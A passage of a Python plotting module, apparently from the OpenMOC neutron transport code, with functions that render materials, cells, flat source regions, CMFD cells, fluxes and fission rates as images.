fsrs = numpy.zeros(num_segments)
for i in range(num_segments):
fsrs[i] = coords[i*vals_per_segment]
x[i*2] = coords[i*vals_per_segment+1]
y[i*2] = coords[i*vals_per_segment+2]
z[i*2] = coords[i*vals_per_segment+3]
x[i*2+1] = coords[i*vals_per_segment+4]
y[i*2+1] = coords[i*vals_per_segment+5]
z[i*2+1] = coords[i*vals_per_segment+6]
# Create array of equally spaced randomized floats as a color map for plots
# Seed the NumPy random number generator to ensure reproducible color maps
numpy.random.seed(1)
color_map = np.linspace(0., 1., num_fsrs, endpoint=False)
numpy.random.shuffle(color_map)
# Make figure of line segments for each track
fig = plt.figure()
for i in range(num_segments):
# Create a color map corresponding to FSR IDs
jet = cm = plt.get_cmap('jet')
cNorm = colors.Normalize(vmin=0, vmax=max(color_map))
scalarMap = cmx.ScalarMappable(norm=cNorm)
color = scalarMap.to_rgba(color_map[fsrs[i] % num_fsrs])
plt.plot([x[i*2], x[i*2+1]], [y[i*2], y[i*2+1]], c=color)
plt.xlim([x.min(), x.max()])
plt.ylim([y.min(), y.max()])
suptitle = 'Segments for ' + str(num_azim) + ' angles, and ' + str(spacing) + \
' cm spacing'
title = 'z = ' + str(z[0])
plt.suptitle(suptitle)
plt.title(title)
filename = directory + 'segments-' + str(num_azim) + '-angles-' + \
str(spacing) + '-spacing-z-' + str(z[0]) + '.png'
fig.savefig(filename, bbox_inches='tight')
plt.close(fig)
##
# @brief This method takes in a Geometry object and plots a color-coded 2D
# surface plot representing the Materials in the Geometry.
# @details The Geometry object must be initialized with Materials, Cells,
# Universes and lattices before being passed into this method. A user
# may invoke this function from an OpenMOC Python file as follows:
#
# @code
# openmoc.plotter.plot_materials(geometry)
# @endcode
#
# @param geometry a geometry object which has been initialized with Materials,
# Cells, Universes and Lattices
# @param gridsize an optional number of grid cells for the plot
# @param xlim optional list/tuple of the minimum/maximum x-coordinates
# @param ylim optional list/tuple of the minimum/maximum y-coordinates
# @param zcoord the optional z coordinate (default is 0.0)
def plot_materials(geometry, gridsize=250, xlim=None, ylim=None, zcoord=None):
global subdirectory
directory = openmoc.get_output_directory() + subdirectory
# Make directory if it does not exist
if not os.path.exists(directory):
os.makedirs(directory)
# Error checking
if not 'Geometry' in str(type(geometry)):
py_printf('ERROR', 'Unable to plot the Materials since ' + \
'input was not a geometry class object')
if not is_integer(gridsize):
py_printf('ERROR', 'Unable to plot the Materials since ' + \
'the gridsize %d is not an integer', gridsize)
if gridsize <= 0:
py_printf('ERROR', 'Unable to plot the Materials ' + \
'with a negative gridsize (%d)', gridsize)
# If zcoord was not set, set the zcoord to 0.0
if zcoord is None:
zcoord = 0.0
# Check z-coord
check_zcoord(geometry, zcoord)
py_printf('NORMAL', 'Plotting the materials...')
# Initialize a NumPy array for the surface colors
surface = numpy.zeros((gridsize, gridsize), numpy.int64)
# Retrieve the pixel coordinates
coords = get_pixel_coords(geometry, gridsize, xlim, ylim)
  # Find the Material IDs for each grid point
for i in range(gridsize):
for j in range(gridsize):
x = coords['x'][i]
y = coords['y'][j]
point = openmoc.LocalCoords(x, y, zcoord)
point.setUniverse(geometry.getRootUniverse())
cell = geometry.findCellContainingCoords(point)
# If we did not find a Cell for this region, use a -1 "bad" number color
if cell is None:
surface[j][i] = -1
else:
surface[j][i] = cell.getFillMaterial().getId()
# Get the number of Materials in the Geometry
materials = geometry.getAllMaterials()
num_materials = len(materials)
# Create array of all Material IDs and randomly (but reproducibly) permute it
material_ids = [material_id for material_id in materials]
numpy.random.seed(1)
numpy.random.shuffle(material_ids)
# Create an array of the colors (array indices) for each value in the surface
colors = np.zeros((gridsize, gridsize))
for material_id in np.unique(surface):
index = material_ids.index(material_id)
indices = np.where(surface == material_id)
colors[indices] = index
# Make Matplotlib color "bad" numbers (ie, NaN, INF) with transparent pixels
cmap = plt.get_cmap('spectral')
cmap.set_bad(alpha=0.0)
# Plot a 2D color map of the Materials
fig = plt.figure()
colors = np.flipud(colors)
plt.imshow(colors, extent=coords['bounds'],
interpolation='nearest', cmap=cmap, vmin=0, vmax=num_materials)
plt.suptitle('Materials')
plt.title('z = ' + str(zcoord))
filename = directory + 'materials-z-' + str(zcoord) + '.png'
fig.savefig(filename, bbox_inches='tight')
plt.close(fig)
##
# @brief This method takes in a Geometry object and plots a color-coded 2D
# surface plot representing the Cells in the Geometry.
# @details The geometry object must be initialized with Materials, Cells,
# Universes and Lattices before being passed into this method. A user
# may invoke this function from an OpenMOC Python file as follows:
#
# @code
# openmoc.plotter.plot_cells(geometry)
# @endcode
#
# @param geometry a Geometry object which has been initialized with Materials,
# Cells, Universes and Lattices
# @param gridsize an optional number of grid cells for the plot
# @param xlim optional list/tuple of the minimum/maximum x-coordinates
# @param ylim optional list/tuple of the minimum/maximum y-coordinates
# @param zcoord the optional z coordinate (default is 0.0)
def plot_cells(geometry, gridsize=250, xlim=None, ylim=None, zcoord=None):
global subdirectory
directory = openmoc.get_output_directory() + subdirectory
# Make directory if it does not exist
if not os.path.exists(directory):
os.makedirs(directory)
# Error checking
if not 'Geometry' in str(type(geometry)):
py_printf('ERROR', 'Unable to plot the Cells since ' + \
'input was not a Geometry class object')
if not is_integer(gridsize):
py_printf('ERROR', 'Unable to plot the Cells since ' + \
'the gridsize %d is not an integer', gridsize)
if gridsize <= 0:
py_printf('ERROR', 'Unable to plot the Cells ' + \
'with a negative gridsize (%d)', gridsize)
if zcoord is None:
zcoord = 0.0
# Check z-coord
check_zcoord(geometry, zcoord)
py_printf('NORMAL', 'Plotting the cells...')
# Initialize a NumPy array for the surface colors
surface = np.zeros((gridsize, gridsize), numpy.int64)
# Retrieve the pixel coordinates
coords = get_pixel_coords(geometry, gridsize, xlim, ylim)
# Find the Cell IDs for each grid point
for i in range(gridsize):
for j in range(gridsize):
x = coords['x'][i]
y = coords['y'][j]
point = openmoc.LocalCoords(x, y, zcoord)
point.setUniverse(geometry.getRootUniverse())
cell = geometry.findCellContainingCoords(point)
# If we did not find a Cell for this region, use a -1 "bad" number color
if cell is None:
surface[j][i] = -1
else:
surface[j][i] = cell.getId()
# Get the number of Material Cells in the Geometry
material_cells = geometry.getAllMaterialCells()
num_cells = len(material_cells)
# Create array of all Cell IDs and randomly (but reproducibly) permute it
cell_ids = [cell_id for cell_id in material_cells]
numpy.random.seed(1)
numpy.random.shuffle(cell_ids)
# Create an array of the colors (array indices) for each value in the surface
colors = np.zeros((gridsize, gridsize))
for cell_id in np.unique(surface):
index = cell_ids.index(cell_id)
indices = np.where(surface == cell_id)
colors[indices] = index
# Make Matplotlib color "bad" numbers (ie, NaN, INF) with transparent pixels
cmap = plt.get_cmap('spectral')
cmap.set_bad(alpha=0.0)
# Plot a 2D color map of the Cells
fig = plt.figure()
colors = np.flipud(colors)
plt.imshow(colors, extent=coords['bounds'],
interpolation='nearest', cmap=cmap, vmin=0, vmax=num_cells)
plt.suptitle('Cells')
plt.title('z = ' + str(zcoord))
filename = directory + 'cells-z-' + str(zcoord) + '.png'
fig.savefig(filename, bbox_inches='tight')
plt.close(fig)
##
# @brief This method takes in a Geometry object and plots a color-coded 2D
# surface plot representing the flat source regions in the Geometry.
# The FSR centroids are plotted as black circles on top of the FSRs if
# the centroids boolean is set to True.
# @details The Geometry object must be initialized with Materials, Cells,
# Universes and Lattices before being passed into this method. A user
# may invoke this function from an OpenMOC Python file as follows:
#
# @code
# openmoc.plotter.plot_flat_source_regions(geometry)
# @endcode
#
# @param geometry a geometry object which has been initialized with Materials,
# Cells, Universes and Lattices
# @param gridsize an optional number of grid cells for the plot
# @param xlim optional list/tuple of the minimum/maximum x-coordinates
# @param ylim optional list/tuple of the minimum/maximum y-coordinates
# @param centroids optional boolean to plot the FSR centroids
# @param marker_type optional string to set the centroids marker type
# @param marker_size optional int/float to set the centroids marker size
def plot_flat_source_regions(geometry, gridsize=250, xlim=None, ylim=None, \
centroids=False, marker_type='o', marker_size=2):
global subdirectory
directory = openmoc.get_output_directory() + subdirectory
# Make directory if it does not exist
if not os.path.exists(directory):
os.makedirs(directory)
# Error checking
if not 'Geometry' in str(type(geometry)):
py_printf('ERROR', 'Unable to plot the flat source regions since ' + \
'input was not a geometry class object')
if not is_integer(gridsize):
py_printf('ERROR', 'Unable to plot the flat source regions since ' + \
'the gridsize %d is not an integer', gridsize)
if gridsize <= 0:
py_printf('ERROR', 'Unable to plot the flat source regions ' + \
'with a negative gridsize (%d)', gridsize)
if not isinstance(centroids, bool):
py_printf('ERROR', 'Unable to plot the flat source regions since ' + \
'centroids is not a boolean')
  if not isinstance(marker_type, str):
    py_printf('ERROR', 'Unable to plot the flat source regions since ' + \
              'marker_type is not a string')
  if marker_type not in matplotlib.markers.MarkerStyle().markers.keys():
    py_printf('ERROR', 'Unable to plot the flat source regions since ' + \
              'marker_type is not a valid marker (%s)', marker_type)
if not is_float(marker_size) and not is_integer(marker_size):
py_printf('ERROR', 'Unable to plot the flat source regions since ' + \
'marker_size is not an int or float', marker_size)
if marker_size <= 0:
py_printf('ERROR', 'Unable to plot the flat source regions ' + \
'with a negative marker_size (%d)', marker_size)
py_printf('NORMAL', 'Plotting the flat source regions...')
# Get the number of flat source regions
num_fsrs = geometry.getNumFSRs()
if num_fsrs == 0:
py_printf('ERROR', 'Unable to plot the flat source regions ' + \
'since no tracks have been generated.')
# Initialize a NumPy array for the surface colors
surface = numpy.zeros((gridsize, gridsize), dtype=np.int64)
# Retrieve the pixel coordinates
coords = get_pixel_coords(geometry, gridsize, xlim, ylim)
# Get the Geometry's z-coord
zcoord = geometry.getFSRPoint(0).getZ()
# Find the flat source region IDs for each grid point
for i in range(gridsize):
for j in range(gridsize):
x = coords['x'][i]
y = coords['y'][j]
local_coords = openmoc.LocalCoords(x, y, zcoord)
local_coords.setUniverse(geometry.getRootUniverse())
geometry.findCellContainingCoords(local_coords)
fsr_id = geometry.getFSRId(local_coords)
      # If we did not find a region for this point, use a -1 "bad" number color
if fsr_id is None:
surface[j][i] = -1
else:
surface[j][i] = fsr_id
del local_coords
# Replace each Cell ID with a random (but reproducible) color ID
# NOTE: This color coding scheme only works for FSRs and CMFD cells and not
# for Materials and Cells. The reason is that FSRs and CMFD cells are by
# definition a sequence of consecutive, monotonically increasing integers.
# Material and Cell IDs however may be any sequence of positive integers.
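  # Illustrative example (hypothetical permutation, not from the original code):
  # with num_fsrs = 4 the seeded shuffle might map IDs [0, 1, 2, 3] to colors
  # [2, 0, 1, 3]; ids_to_colors.take(surface) below then swaps every FSR ID in
  # 'surface' for its permuted color index in a single vectorized lookup.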
all_ids = np.arange(num_fsrs, dtype=np.int64)
id_colors = np.arange(num_fsrs, dtype=np.int64)
numpy.random.seed(1)
np.random.shuffle(id_colors)
ids_to_colors = np.arange(num_fsrs, dtype=np.int64)
ids_to_colors[all_ids] = id_colors
colors = ids_to_colors.take(surface)
# Make Matplotlib color "bad" numbers (ie, NaN, INF) with transparent pixels
cmap = plt.get_cmap('spectral')
cmap.set_bad(alpha=0.0)
# Plot a 2D color map of the flat source regions
fig = plt.figure()
colors = np.flipud(colors)
plt.imshow(colors, extent=coords['bounds'],
interpolation='nearest', cmap=cmap, vmin=0, vmax=num_fsrs)
# Plot centroids on top of 2D FSR color map
if centroids:
centroids_x = []
centroids_y = []
for r in range(geometry.getNumFSRs()):
point = geometry.getFSRCentroid(r)
centroids_x.append(point.getX())
centroids_y.append(point.getY())
plt.scatter(centroids_x, centroids_y, color='k', marker=marker_type, \
s=marker_size)
# Matplotlib likes to add a buffer around scatter plots, so we will
# manually set the plot bounds
plt.xlim(min(coords['x']), max(coords['x']))
plt.ylim(min(coords['y']), max(coords['y']))
# Set the plot title and save the figure
plt.suptitle('Flat Source Regions')
plt.title('z = ' + str(zcoord))
filename = directory + 'flat-source-regions-z-' + str(zcoord) + '.png'
fig.savefig(filename, bbox_inches='tight')
plt.close(fig)
##
# @brief This method takes in a Geometry and Cmfd object and plots a
# color-coded 2D surface plot representing the CMFD cells in a geometry.
# @details The Geometry object must be initialized with Materials, Cells,
# Universes and Lattices before being passed into this method.
# Plotting the CMFD cells requires that segments must have been
# created for the geometry and FSR IDs assigned to regions. A user
# may invoke this function from an OpenMOC Python file as follows:
#
# @code
# openmoc.plotter.plot_cmfd_cells(geometry, cmfd)
# @endcode
#
# @param geometry a geometry object which has been initialized with Materials,
# Cells, Universes and Lattices. Segments must have been created or
# extracted from a file.
# @param cmfd a Cmfd object which has been used with the geometry in
# generating segments. The Cmfd object must have the _overlay_mesh
# flag set to true; otherwise, the map linking FSR IDs to CMFD cells
# would not have been created.
# @param gridsize an optional number of grid cells for the plot
# @param xlim optional list/tuple of the minimum/maximum x-coordinates
# @param ylim optional list/tuple of the minimum/maximum y-coordinates
def plot_cmfd_cells(geometry, cmfd, gridsize=250, xlim=None, ylim=None):
global subdirectory
directory = openmoc.get_output_directory() + subdirectory
# Make directory if it does not exist
if not os.path.exists(directory):
os.makedirs(directory)
# Error checking
if not 'Geometry' in str(type(geometry)):
py_printf('ERROR', 'Unable to plot the CMFD cells since ' + \
'input was not a geometry class object')
if not 'Cmfd' in str(type(cmfd)):
py_printf('ERROR', 'Unable to plot the CMFD cells since ' + \
'input was not a CMFD class object')
if not is_integer(gridsize):
py_printf('ERROR', 'Unable to plot the CMFD cells since ' + \
'the gridsize %s is not an integer', str(gridsize))
if gridsize <= 0:
py_printf('ERROR', 'Unable to plot the CMFD cells ' + \
'with a negative gridsize (%d)', gridsize)
py_printf('NORMAL', 'Plotting the CMFD cells...')
# Initialize a NumPy array for the surface colors
surface = numpy.zeros((gridsize, gridsize), numpy.int64)
# Retrieve the pixel coordinates
coords = get_pixel_coords(geometry, gridsize, xlim, ylim)
# Get the Geometry's z-coord
zcoord = geometry.getFSRPoint(0).getZ()
# Find the CMFD cell ID for each grid point
for i in range(gridsize):
for j in range(gridsize):
x = coords['x'][i]
y = coords['y'][j]
local_coords = openmoc.LocalCoords(x, y, zcoord)
local_coords.setUniverse(geometry.getRootUniverse())
geometry.findCellContainingCoords(local_coords)
fsr_id = geometry.getFSRId(local_coords)
cell_id = cmfd.convertFSRIdToCmfdCell(fsr_id)
# If we did not find a cell for this point, use a -1 "bad" number color
if np.isnan(cell_id):
surface[j][i] = -1
else:
surface[j][i] = cell_id
# Get the number of CMFD cells
num_cmfd_cells = cmfd.getNumCells()
# Replace each Cell ID with a random (but reproducible) color ID
# NOTE: This color coding scheme only works for FSRs and CMFD cells and not
# for Materials and Cells. The reason is that FSRs and CMFD cells are by
# definition a sequence of consecutive, monotonically increasing integers.
# Material and Cell IDs however may be any sequence of positive integers.
all_ids = np.arange(num_cmfd_cells, dtype=np.int64)
id_colors = np.arange(num_cmfd_cells, dtype=np.int64)
numpy.random.seed(1)
np.random.shuffle(id_colors)
ids_to_colors = np.arange(num_cmfd_cells, dtype=np.int64)
ids_to_colors[all_ids] = id_colors
colors = ids_to_colors.take(surface)
# Make Matplotlib color "bad" numbers (ie, NaN, INF) with transparent pixels
cmap = plt.get_cmap('spectral')
cmap.set_bad(alpha=0.0)
# Plot a 2D color map of the CMFD cells
fig = plt.figure()
colors = np.flipud(colors)
plt.imshow(colors, extent=coords['bounds'],
interpolation='nearest', cmap=cmap)
plt.title('CMFD cells')
filename = directory + 'cmfd-cells.png'
fig.savefig(filename, bbox_inches='tight')
##
# @brief This method takes in a Solver object and plots a color-coded 2D
# surface plot representing the flat source region scalar fluxes.
# @details The Solver must have converged the flat sources prior to
# calling this routine. A user may invoke this function from an
# OpenMOC Python file as follows:
#
# @code
# openmoc.plotter.plot_spatial_fluxes(solver, energy_groups=[1,7])
# @endcode
#
# @param solver a Solver object that has converged the source for the Geometry
# @param energy_groups a Python list of integer energy groups to plot
# @param gridsize an optional number of grid cells for the plot
# @param xlim optional list/tuple of the minimum/maximum x-coordinates
# @param ylim optional list/tuple of the minimum/maximum y-coordinates
def plot_spatial_fluxes(solver, energy_groups=[1],
gridsize=250, xlim=None, ylim=None):
global subdirectory
directory = openmoc.get_output_directory() + subdirectory
# Make directory if it does not exist
if not os.path.exists(directory):
os.makedirs(directory)
if not 'Solver' in str(type(solver)):
py_printf('ERROR', 'Unable to plot the FSR flux since the ' + \
'input did not contain a solver class object')
geometry = solver.getGeometry()
num_groups = geometry.getNumEnergyGroups()
if isinstance(energy_groups, (list, tuple, np.ndarray)):
for group in energy_groups:
if not is_integer(group):
py_printf('ERROR', 'Unable to plot the FSR flux since the ' + \
'energy_groups contains %s which is not a number', str(group))
elif group <= 0:
py_printf('ERROR', 'Unable to plot the FSR flux since the ' + \
'energy_groups contains %d which is less than the ' + \
'index for all energy groups', group)
elif group > num_groups:
py_printf('ERROR', 'Unable to plot the FSR flux since the ' + \
'energy_groups contains %d which is greater than ' + \
'the index for all energy groups', group)
else:
py_printf('ERROR', 'Unable to plot the FSR flux since the ' + \
'energy_groups is not a Python tuple/list or NumPy array')
if not is_integer(gridsize):
py_printf('ERROR', 'Unable to plot the FSR flux since the ' + \
'gridsize %s is not an integer', str(gridsize))
if gridsize <= 0:
py_printf('ERROR', 'Unable to plot the FSR flux with a ' + \
'negative gridsize (%d)', gridsize)
py_printf('NORMAL', 'Plotting the FSR scalar fluxes...')
# Initialize a numpy array for the groupwise scalar fluxes
fluxes = numpy.zeros((len(energy_groups), gridsize, gridsize))
# Retrieve the pixel coordinates
coords = get_pixel_coords(geometry, gridsize, xlim, ylim)
# Get the Geometry's z-coord
zcoord = geometry.getFSRPoint(0).getZ()
for i in range(gridsize):
for j in range(gridsize):
# Find the flat source region IDs for each grid point
x = coords['x'][i]
y = coords['y'][j]
point = openmoc.LocalCoords(x, y, zcoord)
point.setUniverse(geometry.getRootUniverse())
geometry.findCellContainingCoords(point)
fsr_id = geometry.getFSRId(point)
      # If we did not find a region for this point, use a -1 "bad" number color
if np.isnan(fsr_id):
fluxes[:,j,i] = -1
# Get the scalar flux for each energy group in this FSR
else:
for index, group in enumerate(energy_groups):
fluxes[index,j,i] = solver.getFlux(fsr_id, group)
# Loop over all energy group and create a plot
for index, group in enumerate(energy_groups):
# Plot a 2D color map of the flat source regions
fig = plt.figure()
plt.imshow(np.flipud(fluxes[index,:,:]), extent=coords['bounds'])
plt.colorbar()
plt.suptitle('FSR Scalar Flux (Group {0})'.format(group))
plt.title('z = ' + str(zcoord))
filename = directory + 'fsr-flux-group-' + str(group) + '-z-' + \
str(zcoord) + '.png'
fig.savefig(filename, bbox_inches='tight')
plt.close(fig)
##
# @brief This method takes in a Solver object and plots the scalar
# flux vs. energy for one or more flat source regions.
# @details The Solver must have converged the flat sources prior to
#          calling this routine. The routine will generate a step plot of the
#          FSR scalar flux across each energy group.
#
# An optional parameter for the energy group bounds may be input.
# The group bounds should be input in increasing order of energy.
# If group bounds are not specified, the routine will use equal
# width steps for each energy group.
#
# A user may invoke this function from an OpenMOC Python file
# as follows:
#
# @code
# openmoc.plotter.plot_energy_fluxes(solver, fsrs=[1,5,20],
# group_bounds=[0., 0.625, 2e7])
# @endcode
#
# @param solver a Solver object that has converged the source for the Geometry
# @param fsrs the flat source region IDs of interest
# @param group_bounds an optional Python list of the energy group bounds (eV)
# @param norm a boolean indicating whether to normalize the flux
# @param loglog boolean indicating whether to plot use a log-log scale
def plot_energy_fluxes(solver, fsrs, group_bounds=None, norm=True, loglog=True):
global subdirectory
directory = openmoc.get_output_directory() + subdirectory
# Make directory if it does not exist
if not os.path.exists(directory):
os.makedirs(directory)
if not 'Solver' in str(type(solver)):
py_printf('ERROR', 'Unable to plot the flux vs. energy ' + \
'since input did not contain a Solver class object')
geometry = solver.getGeometry()
num_fsrs = geometry.getNumFSRs()
num_groups = geometry.getNumEnergyGroups()
if isinstance(fsrs, (tuple, list, np.ndarray)):
for fsr in fsrs:
if not is_integer(fsr):
py_printf('ERROR', 'Unable to plot the flux vs. energy since ' + \
'the fsrs contains %s which is not an int', str(fsr))
elif fsr < 0:
py_printf('ERROR', 'Unable to plot the flux vs. energy since ' + \
'the fsrs contains %d which is less than zero', fsr)
elif fsr >= num_fsrs:
py_printf('ERROR', 'Unable to plot the flux vs. energy since ' + \
'the fsrs contains %d which is greater than the ' + \
'total number of FSRs %d', fsr, num_fsrs)
else:
py_printf('ERROR', 'Unable to plot the flux vs. energy since ' + \
'the fsrs is not a Python tuple, list or NumPy array')
if isinstance(group_bounds, (tuple, list, np.ndarray)):
if not all(low < up for low, up in zip(group_bounds, group_bounds[1:])):
py_printf('ERROR', 'Unable to plot the flux vs. energy since the ' + \
'energy group bounds are not monotonically increasing')
elif len(group_bounds) != geometry.getNumEnergyGroups()+1:
py_printf('ERROR', 'Unable to plot the flux vs. energy since the ' + \
'group bounds does not correspond to %d groups', num_groups)
for bound in group_bounds:
      if not is_integer(bound) and not is_float(bound):
        py_printf('ERROR', 'Unable to plot the flux vs. energy since the ' + \
                  'group bounds contains %s which is not a number', str(bound))
elif bound < 0:
py_printf('ERROR', 'Unable to plot the flux vs. energy since the ' + \
'group bounds contains %f which is less than zero', bound)
elif group_bounds is None:
group_bounds = np.arange(num_groups+1, dtype=np.int)
loglog = False
else:
py_printf('ERROR', 'Unable to plot the flux vs. energy since ' + \
'the group bounds is not a Python tuple, list or NumPy array')
py_printf('NORMAL', 'Plotting the scalar fluxes vs. energy...')
# Compute difference in energy bounds for each group
group_deltas = np.ediff1d(group_bounds)
group_bounds = np.flipud(group_bounds)
group_deltas = np.flipud(group_deltas)
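  # Note: the bounds are supplied in increasing order of energy, while the fluxes
  # below are indexed by group number (group 1 conventionally being the
  # highest-energy group), so both arrays are flipped to descending energy here
  # so that fluxes[0] lines up with the highest-energy bin.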
# Iterate over all flat source regions
for fsr in fsrs:
# Allocate memory for an array of this FSR's fluxes
fluxes = np.zeros(num_groups, dtype=np.float)
# Extract the flux in each energy group
for group in range(num_groups):
fluxes[group] = solver.getFlux(fsr, group+1)
# Normalize fluxes to the total integrated flux
if norm:
fluxes /= np.sum(group_deltas * fluxes)
# Initialize a separate plot for this FSR's fluxes
fig = plt.figure()
# Draw horizontal/vertical lines on the plot for each energy group
for group in range(num_groups):
# Horizontal line
if loglog:
plt.loglog(group_bounds[group:group+2], [fluxes[group]]*2,
linewidth=3, c='b', label='openmoc', linestyle='-')
else:
plt.plot(group_bounds[group:group+2], [fluxes[group]]*2,
linewidth=3, c='b', label='openmoc', linestyle='-')
# Vertical lines
if group < num_groups - 1:
if loglog:
plt.loglog([group_bounds[group+1]]*2, fluxes[group:group+2],
c='b', linestyle='--')
else:
plt.plot([group_bounds[group+1]]*2, fluxes[group:group+2],
c='b', linestyle='--')
plt.xlabel('Energy')
plt.ylabel('Flux')
plt.xlim((min(group_bounds), max(group_bounds)))
plt.grid()
plt.title('FSR {0} Flux ({1} groups)'.format(fsr, num_groups))
filename = directory + 'flux-fsr-' + str(fsr) + '.png'
plt.savefig(filename, bbox_inches='tight')
plt.close(fig)
##
# @brief This method plots a color-coded 2D surface plot representing the
# FSR fission rates in the Geometry.
# @details The Solver must have converged the flat sources prior to
# calling this routine. A user may invoke this function from an
# OpenMOC Python file as follows:
#
# @code
# openmoc.plotter.plot_fission_rates(solver)
# @endcode
#
# @param solver a Solver object that has converged the source for the Geometry
# @param gridsize an optional number of grid cells for the plot
# @param xlim optional list/tuple of the minimim/maximum x-coordinates
# @param ylim optional list/tuple of the minimim/maximum y-coordinates
def plot_fission_rates(solver, gridsize=250, xlim=None, ylim=None):
global subdirectory
directory = openmoc.get_output_directory() + subdirectory
# Make directory if it does not exist
if not os.path.exists(directory):
os.makedirs(directory)
if not 'Solver' in str(type(solver)):
py_printf('ERROR', 'Unable to plot the fission rates ' + \
'since input did not contain a solver class object')
if not is_integer(gridsize):
py_printf('ERROR', 'Unable to plot the fission rates ' + \
'since the gridsize %s is not an integer', str(gridsize))
if gridsize <= 0:
py_printf('ERROR', 'Unable to plot the fission rates ' + \
'with a negative gridsize (%d)', gridsize)
py_printf('NORMAL', 'Plotting the flat source region fission rates...')
# Get geometry
geometry = solver.getGeometry()
# Compute the volume-weighted fission rates for each FSR
fission_rates = solver.computeFSRFissionRates(geometry.getNumFSRs())
# Initialize a numpy array of fission rates
surface = numpy.zeros((gridsize, gridsize))
# Retrieve the pixel coordinates
coords = get_pixel_coords(geometry, gridsize, xlim, ylim)
# Get the Geometry's z-coord
zcoord = geometry.getFSRPoint(0).getZ()
for i in range(gridsize):
for j in range(gridsize):
# Find the flat source region IDs for each grid point
      x = coords['x'][i]
      y = coords['y'][j]
point = openmoc.LocalCoords(x, y, zcoord)
point.setUniverse(geometry.getRootUniverse())
geometry.findCellContainingCoords(point)
fsr_id = geometry.getFSRId(point)
      # If we did not find a region for this point, use a -1 "bad" number color
if np.isnan(fsr_id):
surface[j][i] = -1
# Get the fission rate in this FSR
else:
surface[j][i] = fission_rates[fsr_id]
# Plot a 2D color map of the flat source regions fission rates
fig = plt.figure()
plt.imshow(np.flipud(surface), extent=coords['bounds'])
plt.colorbar()
plt.suptitle('Flat Source Region Fission Rates')
plt.title('z = ' + str(zcoord))
filename = directory + 'fission-rates-z-' + str(zcoord) + '.png'
fig.savefig(filename, bbox_inches='tight')
##
# @brief This method plots a color-coded 2D surface plot representing the
# FSR scalar fluxes for various eigenmodes from an IRAMSolver.
# @details The IRAMSolver must have computed the eigenmodes prior to
# calling this routine. A user may invoke this function from
# an OpenMOC Python file as follows:
#
# @code
# openmoc.plotter.plot_eigenmode_fluxes(iramsolver, energy_groups=[1,7])
# @endcode
#
# @param iramsolver an IRAMSolver object that has computed the eigenmodes
# @param eigenmodes a Python list of integer eigenmodes to plot
# @param energy_groups a Python list of integer energy groups to plot
# @param gridsize an optional number of grid cells for the plot
# @param xlim optional list/tuple of the minimum/maximum x-coordinates
# @param ylim optional list/tuple of the minimum/maximum y-coordinates
def plot_eigenmode_fluxes(iramsolver, eigenmodes=[], energy_groups=[1],
gridsize=250, xlim=None, ylim=None):
global subdirectory
directory = openmoc.get_output_directory() + subdirectory
# Make directory if it does not exist
if not os.path.exists(directory):
os.makedirs(directory)
if not 'IRAMSolver' in str(type(iramsolver)):
py_printf('ERROR', 'Unable to plot the eigenmode fluxes ' + \
'since input did not contain an IRAMSolver class object')
if isinstance(eigenmodes, (list, tuple, np.ndarray)):
# If eigenmodes parameters is empty list, plot all eigenmodes
if len(eigenmodes) == 0:
eigenmodes = np.arange(1, iramsolver._num_modes+1)
for mode in eigenmodes:
if not is_integer(mode):
py_printf('ERROR', 'Unable to plot the eigenmode flux since the ' + \
'eigenmodes contains %s which is not a number', str(mode))
elif mode <= 0:
py_printf('ERROR', 'Unable to plot the eigenmode flux since the ' + \
'eigenmodes contains %d which is negative', mode)
elif mode > iramsolver._num_modes:
        py_printf('ERROR', 'Unable to plot the eigenmode flux since the ' + \
                  'eigenmodes contains %d but the IRAMSolver only ' + \
                  'computed %d modes', mode, iramsolver._num_modes)
else:
py_printf('ERROR', 'Unable to plot the eigenmode flux since the ' + \
'eigenmodes is not a Python tuple/list or NumPy array')
py_printf('NORMAL', 'Plotting the eigenmode fluxes...')
# Extract the MOC Solver from the IRAMSolver
moc_solver = iramsolver._moc_solver
# Loop over each eigenmode
for mode in eigenmodes:
# Extract the eigenvector for this eigenmode from the IRAMSolver
eigenvec = iramsolver._eigenvectors[:,mode-1]
# Convert it into a form that SWIG will be happy with
eigenvec = np.squeeze(np.ascontiguousarray(eigenvec))
eigenvec = np.real(eigenvec).astype(iramsolver._precision)
# Ensure the primary eigenvector is positive
if(mode-1 == 0):
eigenvec = np.abs(eigenvec)
# Insert eigenvector into MOC Solver object
moc_solver.setFluxes(eigenvec)
# Set subdirectory folder for this eigenmode
num_digits = len(str(max(eigenmodes)))
subdirectory = '/plots/eig-{0}-flux/'.format(str(mode).zfill(num_digits))
# Plot this eigenmode's spatial fluxes
plot_spatial_fluxes(moc_solver, energy_groups, gridsize, xlim, ylim)
# Reset global subdirectory
subdirectory = '/plots/'
##
# @brief This is a helper method to define coordinates for a plotting window.
# @details This routine builds a coordinate surface map for the plotting
#          window defined by the user. If no window was defined, then
# this routine uses the outer bounding box around the geometry as
# the plotting window.
# @param geometry a Geometry object which has been initialized with Materials,
# Cells, Universes and Lattices
# @param gridsize an optional number of grid cells for the plot
# @param xlim optional list/tuple of the minimum/maximum x-coordinates
# @param ylim optional list/tuple of the minimum/maximum y-coordinates
# @return a dictionary with the plotting window map and bounding box
def get_pixel_coords(geometry, gridsize, xlim, ylim):
# initialize variables to be returned
bounds = [geometry.getMinX() + TINY_MOVE, geometry.getMaxX() - TINY_MOVE,
geometry.getMinY() + TINY_MOVE, geometry.getMaxY() - TINY_MOVE]
xcoords = None
ycoords = None
coords = dict()
if not xlim is None:
bounds[0] = xlim[0]
bounds[1] = xlim[1]
if not ylim is None:
bounds[2] = ylim[0]
bounds[3] = ylim[1]
xcoords = np.linspace(bounds[0], bounds[1], gridsize)
ycoords = np.linspace(bounds[2], bounds[3], gridsize)
# add attributes to coords dictionary
coords['x'] = xcoords
coords['y'] = ycoords
coords['bounds'] = bounds
return coords
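# Illustrative usage of get_pixel_coords (hypothetical window values, not taken
# from this module):
#
#   coords = get_pixel_coords(geometry, 500, xlim=(-2.0, 2.0), ylim=(-2.0, 2.0))
#   plt.imshow(data, extent=coords['bounds'])
#
# which mirrors how the plotting routines above consume the returned dictionary.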
##
# @brief This is a helper method to check that z-coord falls within the bounds
# of the geometry.
# @param geometry a Geometry object which has been initialized with Materials,
# Cells, Universes and Lattices
# @param zcoord the z coordinate
def check_zcoord(geometry, zcoord):
if not is_float(zcoord):
    py_printf('ERROR', 'Unable to produce plot since ' + \
              'the z-coord %s is not a float', str(zcoord))
  elif zcoord < geometry.getMinZ() or zcoord > geometry.getMaxZ():
    py_printf('ERROR', 'Unable to produce plot since ' + \
